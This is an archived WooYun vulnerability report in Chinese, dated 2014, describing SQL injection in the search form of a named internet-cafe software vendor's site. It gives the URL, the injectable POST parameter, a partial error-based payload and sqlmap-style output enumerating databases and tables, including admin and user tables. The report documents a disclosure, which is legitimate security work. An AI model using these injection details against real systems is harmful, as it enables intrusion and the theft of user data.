乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-05-23: 积极联系厂商并且等待厂商认领中,细节不对外公开 2014-07-07: 厂商已经主动忽略漏洞,细节向公众公开
摇钱树网吧管理软件SQL注射导致大量用户敏感信息泄露
注册个用户登陆后,访问如下地址:http://www.soft.u7pk.com/User_bbs.html
搜索处存在post注入payload太长了,就不全部给出了
Place: POSTParameter: TextBox1 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __VIEWSTATE=/wEPDwUKLTM1Njk5NTU5Mg9kFgICAw9kFgoCAQ9kFgQCAQ8WAh4EVGV4dAWRAeasoui/juaCqO+web server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2000current user: 'yqsuser'给出部分表吧Database: tempdb[2 tables]+--------------------------------------------+| sysconstraints || syssegments |+--------------------------------------------+Database: msdb[82 tables]+--------------------------------------------+| RTblClassDefs || RTblDBMProps || RTblDBXProps || RTblDTMProps || RTblDTSProps || RTblDatabaseVersion || RTblEQMProps || RTblEnumerationDef || RTblEnumerationValueDef || RTblGENProps || RTblIfaceDefs || RTblIfaceHier || RTblIfaceMem || RTblMDSProps || RTblNamedObj || RTblOLPProps || RTblParameterDef || RTblPropDefs || RTblProps || RTblRelColDefs || RTblRelshipDefs || RTblRelshipProps || RTblRelships || RTblSIMProps || RTblScriptDefs || RTblSites || RTblSumInfo || RTblTFMProps || RTblTypeInfo || RTblTypeLibs || RTblUMLProps || RTblUMXProps || RTblVersionAdminInfo || RTblVersions || RTblWorkspaceItems || backupfile || backupmediafamily || backupmediaset || backupset || log_shipping_databases || log_shipping_monitor || log_shipping_plan_databases || log_shipping_plan_history || log_shipping_plans || log_shipping_primaries || log_shipping_secondaries || logmarkhistory || mswebtasks |Database: youxi[54 tables]+--------------------------------------------+| QQ || admin || article || banner || bbs || collect || costrate || cqzcm || diaocha || dls || down || dtproperties || dzmac || factive || filesize || findpass || gactive || game || ggbfjl || gonggao || help || ip || jianjie || joinactive || jyzcm || jzxzb || leaveword || loginfo || monthtmp || mrgg || notes || orderform || phb || pk || plantab || pricelist || site || softintro || softnews || softweb || sysconstraints || syssegments || temp || tempphb || toupiao || userm || wbm || wenzhang || xzzj || yxm || yxxzb || zcxx || zczhuc || yqsuser.pangolin_test_table |+--------------------------------------------+Database: Northwind[31 tables]+--------------------------------------------+| Categories || CustomerCustomerDemo || CustomerDemographics || Customers || EmployeeTerritories |
管理员用户名和密码
大量用户敏感信息,这里贴出一部分吧
见上
Null
未能联系到厂商或者厂商积极拒绝